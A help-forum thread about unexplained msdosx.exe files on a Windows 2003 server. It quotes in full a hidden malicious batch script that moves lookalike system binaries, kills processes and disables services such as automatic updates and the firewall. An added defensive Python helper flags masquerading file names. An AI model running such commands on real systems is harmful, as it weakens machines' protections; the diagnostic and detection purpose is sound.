zombie99

msdosx.exe

Keep finding msdosx.exe on c:\ on a Win2k3 server. AV and spyware software do not find any problems.

Does anyone know what this is?
fuzzymallets1

zombie99

ASKER

Same thing I have found. But if you delete it, after rebooting it comes back.

Then try using a different antivirus and anti-spyware. What all have you used?

I got McAfee GroupShield (it happens to be an Exchange server...) with the latest update & SUPERAntiSpyware... In the past these have worked for me.

I appreciate the help
Ok, after doing some research... I found under the \windows\temp folder a hidden file called bt3388.bat, that creates a mess in the windows\system and system32 folders.

Also, apparently this "virus" is new since there was no information prior to 02/13/09.  

This is the script on the file:

cd %windir%\fix
attrib -s -h %windir%\system32\lssas.exe
attrib -s -h %windir%\system32\spooIsv.exe
attrib -s -h %windir%\system32\csrs.exe
attrib -s -h %windir%\system\smsc32.exe
attrib -s -h %windir%\system32\msddns.exe
attrib -s -h %windir%\system32\Isass.exe
attrib -s -h %windir%\system32\winIogon.exe
attrib -s -h %windir%\system32\regsvr.exe
attrib -s -h %windir%\usbservice.exe
attrib -s -h %windir%\FireFoxUpdater.exe
attrib -s -h %windir%\TSM7GN.exe
attrib -s -h %windir%\part2p.exe
attrib -s -h %windir%\system32\sysmgr.exe
attrib -s -h %windir%\system32\spoolsvc.exe
attrib -s -h %windir%\system32\no.exe.exe
attrib -s -h %windir%\system32\csrmgr.exe
attrib -s -h %windir%\system32\csrms.exe
attrib -s -h %windir%\system32\wgareg.exe
attrib -s -h %windir%\part1p.exe
attrib -s -h %windir%\sithhqp.exe
attrib -s -h C:\msisrv.exe
attrib -s -h %windir%\system32\msr.exe
attrib -s -h %windir%\security\svchost.exe
attrib -s -h %windir%\system\wuauclt.exe
attrib -s -h %windir%\system\msddll.exe
attrib -s -h %windir%\system\svhost.exe
attrib -s -h %windir%\system\vmwareservice.exe
attrib -s -h %windir%\lsass.exe
attrib -s -h %windir%\system32\service.exe
attrib -s -h C:\skp.exe
attrib -s -h %windir%\system32\wins\wmsncs.exe
attrib -s -h %windir%\system32\hgcheck.exe
attrib -s -h %windir%\system32\afisicx.exe
attrib -s -h %windir%\fonts\wmsncs.exe
attrib -s -h C:\recycler\tesktas.exe
attrib -s -h %windir%\system32\noytcyr.exe
attrib -s -h %windir%\system32\roytctm.exe
attrib -s -h %windir%\system32\soxpeca.exe
attrib -s -h %windir%\system32\tdydowkc.exe
attrib -s -h %windir%\system32\wsldoekd.exe
attrib -s -h %windir%\system32\udxfytw.sys
attrib -s -h %windir%\system32\msservice.exe
attrib -s -h %windir%\system32\csrsc.exe
attrib -s -h %windir%\system32\wscntfysvc.exe
attrib -s -h %windir%\system32\msnco.exe
move %windir%\system32\lssas.exe %windir%\temp\%random%
move %windir%\system32\spooIsv.exe %windir%\temp\%random%
move %windir%\system32\csrs.exe %windir%\temp\%random%
move %windir%\system32\Isass.exe %windir%\temp\%random%
move %windir%\system32\winIogon.exe %windir%\temp\%random%
pv -kf Isass.exe
pv -kf winIogon.exe
pv -kf lssas.exe
pv -kf spooIsv.exe
move %windir%\system32\lssas.exe %windir%\temp\%random%
move %windir%\system32\spooIsv.exe %windir%\temp\%random%
move %windir%\system32\csrs.exe %windir%\temp\%random%
move %windir%\system32\Isass.exe %windir%\temp\%random%
move %windir%\system32\winIogon.exe %windir%\temp\%random%
move %windir%\system32\msddns.exe %windir%\temp\%random%
move %windir%\system32\regsvr.exe %windir%\temp\%random%
move %windir%\smsc32.exe %windir%\temp\%random%
move %windir%\usbservice.exe %windir%\temp\%random%
move %windir%\FireFoxUpdater.exe %windir%\temp\%random%
move %windir%\TSM7GN.exe %windir%\temp\%random%
move %windir%\fonts\wmsncs.exe %windir%\temp\%random%
move %windir%\system\wuauclt.exe %windir%\temp\%random%
move %windir%\system32\csrsc.exe %windir%\temp\%random%
move %windir%\system32\wscntfysvc.exe %windir%\temp\%random%
move %windir%\system32\msnco.exe %windir%\temp\%random%
move %windir%\system32\msservice.exe %windir%\temp\%random%
move %windir%\system32\wgareg.exe %windir%\temp\%random%
move %windir%\system32\sysmgr.exe %windir%\temp\%random%
move %windir%\system32\spoolsvc.exe %windir%\temp\%random%
move %windir%\system32\no.exe.exe %windir%\temp\%random%
move %windir%\system32\udxfytw.sys %windir%\temp\%random%
move %windir%\system32\tpszxyd.sys %windir%\temp\%random%
move %windir%\system32\java.exe %windir%\temp\%random%
move %windir%\system32\sysmgr.exe %windir%\temp\%random%
move %windir%\system32\afisicx.exe %windir%\temp\%random%
move %windir%\system32\noytcyr.exe %windir%\temp\%random%
move %windir%\system32\wsldoekd.exe %windir%\temp\%random%
move %windir%\system32\roytctm.exe %windir%\temp\%random%
move %windir%\system32\tdydowkc.exe %windir%\temp\%random%
move %windir%\system32\mabidwe.exe %windir%\temp\%random%
move %windir%\system32\soxpeca.exe %windir%\temp\%random%
move %windir%\tsnp2std.exe %windir%\%random%
move %windir%\system32\msddns.exe %windir%\temp\%random%
pv -kf msddns.exe
move %windir%\system32\msddns.exe %windir%\temp\%random%
move %windir%\svchost.exe %windir%\%random%
move %windir%\fixcamera.exe %windir%\%random%
pv -kf tsnp2std.exe
pv -kf fixcamera.exe
move %windir%\tsnp2std.exe %windir%\%random%
move %windir%\svchost.exe %windir%\%random%
pv -kf FireFoxUpdater.exe
pv kf TSM7GN.exe
move %windir%\FireFoxUpdater.exe %windir%\temp\%random%
move %windir%\TSM7GN.exe %windir%\temp\%random%
move %windir%\fixcamera.exe %windir%\%random%
pv -kf wuauclt.exe
move %windir%\system\wuauclt.exe %windir%\temp\%random%
pv -kf wgareg.exe
pv -kf msservice.exe
move %windir%\usbservice.exe %windir%\temp\%random%
pv -kf usbservice.exe
move %windir%\usbservice.exe %windir%\temp\%random%
pv -kf *.sys
pv -kf csrmgr.exe
move %windir%\smsc32.exe %windir%\temp\%random%
pv -kf smsc32.exe
move %windir%\smsc32.exe %windir%\temp\%random%
pv -kf csrms.exe
pv -kf spoolsvc.exe
pv -kf sysmgr.exe
move %windir%\system32\regsvr.exe %windir%\temp\%random%
pv -kf regsvr.exe
move %windir%\system32\regsvr.exe %windir%\temp\%random%
pv -kf wscntfy.exe
pv -kf no.exe.exe
pv -kf sysmgr.exe
pv -kf afisicx.exe
pv -kf noytcyr.exe
pv -kf wsldoekd.exe
pv -kf roytctm.exe
pv -kf tdydowkc.exe
pv -kf mabidwe.exe
pv -kf soxpeca.exe
pv -kf rundll*
pv -kf ntv*
pv -kf dww*
pv -kf ping*
pv -kf task*
pv -kf csrsc.exe
pv -kf wscntfysvc.exe
pv -kf msnco.exe
move %windir%\fonts\wmsncs.exe %windir%\temp\%random%
pv -kf wmsncs.exe
move %windir%\fonts\wmsncs.exe %windir%\temp\%random%
cls
move %windir%\system32\csrsc.exe %windir%\temp\%random%
move %windir%\system32\wscntfysvc.exe %windir%\temp\%random%
move %windir%\system32\msnco.exe %windir%\temp\%random%
move %windir%\system32\msservice.exe %windir%\temp\%random%
move %windir%\system32\wgareg.exe %windir%\temp\%random%
move %windir%\system32\sysmgr.exe %windir%\temp\%random%
move %windir%\system32\spoolsvc.exe %windir%\temp\%random%
move %windir%\system32\no.exe.exe %windir%\temp\%random%
move %windir%\system32\udxfytw.sys %windir%\temp\%random%
move %windir%\system32\tpszxyd.sys %windir%\temp\%random%
move %windir%\system32\java.exe %windir%\temp\%random%
cls
move %windir%\system32\sysmgr.exe %windir%\temp\%random%
move %windir%\system32\afisicx.exe %windir%\temp\%random%
move %windir%\system32\noytcyr.exe %windir%\temp\%random%
move %windir%\system32\wsldoekd.exe %windir%\temp\%random%
move %windir%\system32\roytctm.exe %windir%\temp\%random%
move %windir%\system32\tdydowkc.exe %windir%\temp\%random%
move %windir%\system32\mabidwe.exe %windir%\temp\%random%
move %windir%\system32\soxpeca.exe %windir%\temp\%random%
move %windir%\system32\msservice.exe %windir%\temp\%random%
attrib -s -h %windir%\temp\csrssc.exe
attrib -s -h %windir%\winlogon.exe
pv -kf csrssc.exe
move %windir%\temp\csrssc.exe
move %windir%\winlogon.exe
cls
move %windir%\system32\udxfytw.sys %windir%\temp\%random%
move %windir%\part2p.exe %windir%\temp\%random%
move %windir%\part1p.exe %windir%\temp\%random%
move %windir%\sithhqp.exe %windir%\temp\%random%
move C:\msisrv.exe %windir%\temp\%random%
move %windir%\system32\msr.exe %windir%\temp\%random%
move %windir%\security\svchost.exe %windir%\temp\%random%
move %windir%\security\svchost.exe %windir%\temp\%random%
move %windir%\system\msddll.exe %windir%\temp\%random%
move %windir%\system\svhost.exe %windir%\temp\%random%
move %windir%\system\vmwareservice.exe %windir%\temp\%random%
move %windir%\part2p.exe %windir%\temp\%random%
move %windir%\part1p.exe %windir%\temp\%random%
move %windir%\sithhqp.exe %windir%\temp\%random%
move %windir%\lsass.exe %windir%\temp\%random%
move %windir%\system32\service.exe %windir%\temp\%random%
move C:\skp.exe %windir%\temp\%random%
cls
move %windir%\system32\wins\wmsncs.exe %windir%\temp\%random%
move %windir%\system32\hgcheck.exe %windir%\temp\%random%
move %windir%\system32\afisicx.exe %windir%\temp\%random%
move C:\recycler\tesktas.exe %windir%\temp\%random%
move %windir%\system32\noytcyr.exe %windir%\temp\%random%
move %windir%\system32\roytctm.exe %windir%\temp\%random%
move %windir%\system32\soxpeca.exe %windir%\temp\%random%
move %windir%\system32\tdydowkc.exe %windir%\temp\%random%
cls
move %windir%\system32\wsldoekd.exe %windir%\temp\%random%
move %windir%\system32\udxfytw.sys %windir%\temp\%random%
pv -kf udxfytw.sys
move %windir%\system32\udxfytw.sys %windir%\temp\%random%
move %windir%\system32\hgcheck.exe %windir%\temp\%random%
pv -kf hgcheck.exe
move %windir%\system32\hgcheck.exe %windir%\temp\%random%
move %windir%\system32\wins\wmsncs.exe %windir%\temp\%random%
pv -kf wmsncs.exe
move %windir%\system32\wins\wmsncs.exe %windir%\temp\%random%
move %windir%\system32\service.exe %windir%\temp\%random%
pv -kf service.exe
move %windir%\system32\service.exe %windir%\temp\%random%
move %windir%\system32\hgcheck.exe %windir%\temp\%random%
pv -kf hgcheck.exe
move %windir%\system32\hgcheck.exe %windir%\temp\%random%
cls
move C:\msisrv.exe %windir%\temp\%random%
pv -kf msisrv.exe
move C:\msisrv.exe %windir%\temp\%random%
move %windir%\system32\msr.exe %windir%\temp\%random%
scx config msrpxy start= disabled
scx delete msrpxy
pv -kf msr.exe
scx config msrpxy start= disabled
scx delete msrpxy
scx config AccessSharing start= disabled
scx config winspoolsvc start= disabled
scx config mscncosd start= disabled
cls
move %windir%\system32\msr.exe %windir%\temp\%random%
move %windir%\security\svchost.exe %windir%\temp\%random%
scx config WinHost32Svr start= disabled
move %windir%\security\svchost.exe %windir%\temp\%random%
move %windir%\system\msddll.exe %windir%\temp\%random%
scx config msddll start= disabled
pv -kf msddll.exe
cls
move %windir%\system\msddll.exe %windir%\temp\%random%
move %windir%\system\svhost.exe %windir%\temp\%random%
scx config "WindowsTelephony" start= disabled
pv -kf svhost.exe
cls
move %windir%\system\svhost.exe %windir%\temp\%random%
move %windir%\system\vmwareservice.exe %windir%\temp\%random%
scx config VmwareService start= disabled
pv -kf vmwareservice.exe
cls
move %windir%\system\vmwareservice.exe %windir%\temp\%random%
move %windir%\part2p.exe %windir%\temp\%random%
move %windir%\part1p.exe %windir%\temp\%random%
move %windir%\sithhqp.exe %windir%\temp\%random%
pv -kf part2p.exe
pv -kf part1p.exe
pv -kf sithhqp.exe
cls
move %windir%\part2p.exe %windir%\temp\%random%
move %windir%\part1p.exe %windir%\temp\%random%
move %windir%\sithhqp.exe %windir%\temp\%random%
scx config afisicx start= disabled
%windir%\system32\afisicx.exe
pv -kf afisicx.exe
scx stop afisicx.exe
scx config HCencerSer start= disabled
C:\recycler\tesktas.exe
pv -kf tesktas.exe
scx stop HcencerSer
scx config noytcyr start= disabled
%windir%\system32\noytcyr.exe
pv -kf noytcyr.exe
scx stop noytcyr
scx config roytctm start= disabled
%windir%\system32\roytctm.exe
pv -kf roytctm.exe
scx stop roytctm.exe
scx config soxpeca start= disabled
cls
%windir%\system32\soxpeca.exe
pv -kf soxpeca.exe
scx stop soxpeca.exe
scx config tdydowkc start= disabled
%windir%\system32\tdydowkc.exe
pv -kf tdydowkc.exe
scx stop tdydwokc
scx config wsldoekd start= disabled
%windir%\system32\wsldoekd.exe
pv -kf wsldoekd.exe
scx config "Usb Service 2.0" start= disabled
pv -kf usbservice.exe
scx config ypadky start= disabled
scx stop ypadky
scx stop wsldoekd
scx config Wxsynas start= disabled
scx stop Wxsynas
scx stop dnshost
scx config dnshost start= disabled
scx config winhost32svr start= disabled
scx config netstats start= disabled
scx stop ICF
cls
scx config "Windows automatic updates" start= disabled
pv -kf wuauclt.exe
move %windir%\system\wuauclt.exe %windir%\temp\%random%
scx delete ICF
move %windir%\system32\afisicx.exe %windir%\temp\%random%
move C:\recycler\tesktas.exe %windir%\temp\%random%
move %windir%\system32\noytcyr.exe %windir%\temp\%random%
move %windir%\system32\roytctm.exe %windir%\temp\%random%
move %windir%\system32\soxpeca.exe %windir%\temp\%random%
move %windir%\system32\tdydowkc.exe %windir%\temp\%random%
move %windir%\system32\wsldoekd.exe %windir%\temp\%random%
IF EXIST C:\recycler\s-1-5-21-1482476501-1644491937-682003330-1013\cfixer.exe (
pv -kf explor*
cd "c:\recycler\s-1-5-21-1482476501-1644491937-682003330-1013"
move cfixer.exe %windir%\%random%
)

del scx.exe
del pv.exe
cls
del C:\Helios.exe
del C:\msdos.exe
del C:\msdosx.exe
del C:\1.exe
del cln.bat

------------------------------------------------------------------

Any idea on how to reverse all this without re-installing?

Any help is appreciated.
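
The script quoted above goes after files whose names imitate Windows system binaries (lssas.exe, Isass.exe with a capital I, svhost.exe) or that use a genuine name in the wrong folder (%windir%\lsass.exe). As an added example, not part of the original thread, this Python triage helper extracts the file paths a batch script references and flags both patterns; the SYSTEM32 list, the function names and the verdict labels are assumptions made for illustration, and only %windir%-style paths are recognised as system32.

```python
import re

# Genuine Windows binaries that live in %windir%\system32 (assumed short list, extend as needed).
SYSTEM32 = {"lsass.exe", "csrss.exe", "winlogon.exe", "svchost.exe",
            "spoolsv.exe", "services.exe", "smss.exe", "wuauclt.exe"}
PATH_RE = re.compile(r'((?:%windir%|[a-z]:)(?:\\[^\\\s"]+)*)\\([^\\\s"]+\.(?:exe|sys))', re.I)
LOOKALIKES = str.maketrans({"I": "l", "1": "l", "0": "o"})  # capital I posing as l, etc.

def osa(a, b):
    """Edit distance in which swapping two adjacent characters costs one edit."""
    d = [[max(i, j) if 0 in (i, j) else 0 for j in range(len(b) + 1)] for i in range(len(a) + 1)]
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            d[i][j] = min(d[i-1][j] + 1, d[i][j-1] + 1, d[i-1][j-1] + (a[i-1] != b[j-1]))
            if i > 1 and j > 1 and a[i-1] == b[j-2] and a[i-2] == b[j-1]:
                d[i][j] = min(d[i][j], d[i-2][j-2] + 1)
    return d[-1][-1]

def classify(directory, name):
    """Return (reason, impersonated binary) for a masquerading file, else None."""
    lname = name.lower()
    if lname in SYSTEM32:  # real name: only expected inside system32
        return None if directory.lower() == r"%windir%\system32" else ("wrong-directory", lname)
    folded = name.translate(LOOKALIKES).lower()
    if folded in SYSTEM32:
        return ("homoglyph", folded)
    for real in sorted(SYSTEM32):
        if osa(lname, real) == 1:  # one typo away from a real name
            return ("near-miss", real)
    return None

def triage(script):
    """Map every suspicious path referenced in a batch script to its verdict."""
    hits = {}
    for directory, name in PATH_RE.findall(script):
        verdict = classify(directory, name)
        if verdict:
            hits[directory + "\\" + name] = verdict
    return hits

# Six lines taken from the bt3388.bat script quoted in the post above.
SAMPLE = r"""attrib -s -h %windir%\system32\lssas.exe
attrib -s -h %windir%\system32\Isass.exe
move %windir%\security\svchost.exe %windir%\temp\%random%
move %windir%\system\svhost.exe %windir%\temp\%random%
move %windir%\lsass.exe %windir%\temp\%random%
move %windir%\system32\msr.exe %windir%\temp\%random%"""

for path, verdict in triage(SAMPLE).items():
    print(path, *verdict)
```

The same classify() check can be pointed at a directory listing or a process list instead of a script; names such as msr.exe that resemble no system binary pass through unflagged and need other evidence.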
Any ideas yet? I am having the same problem. My system32 folder is filling up with temp*.bk files.

Ended up deleting everything manually. It works now.